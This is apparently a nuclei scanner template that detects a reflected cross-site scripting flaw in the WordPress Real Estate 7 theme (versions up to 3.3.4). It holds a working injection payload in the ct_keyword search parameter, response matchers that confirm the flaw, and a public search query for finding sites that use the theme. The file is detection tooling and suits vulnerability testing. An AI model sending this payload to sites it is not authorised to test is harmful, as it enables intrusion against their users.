nuclei-templates/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml

38 lines
1.9 KiB
YAML

id: wp-real-estate-xss
info:
name: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting
author: Harsh
severity: medium
description: |
The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
reference:
- https://www.exploitalert.com/view-details.html?id=39344
- https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
- https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/themes/realestate-7/"
tags: packetstorm,wordpress,wp-theme,wp,xss,realestate
http:
- method: GET
path:
- "{{BaseURL}}/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<img src=x onerror=prompt(document.domain)>")'
- 'contains(body, "/wp-content/themes/realestate-7/")'
condition: and
# digest: 4a0a0047304502206c539003b913a5aa84666f731c82c96bb3aec3f8fe23d82ea49a4f605525ecba022100de91aaf7c5e02ad1c794895f6017562d5a314e1fd3bf1e877253019f285191b3:922c64590222798bb761d5b6d8e72950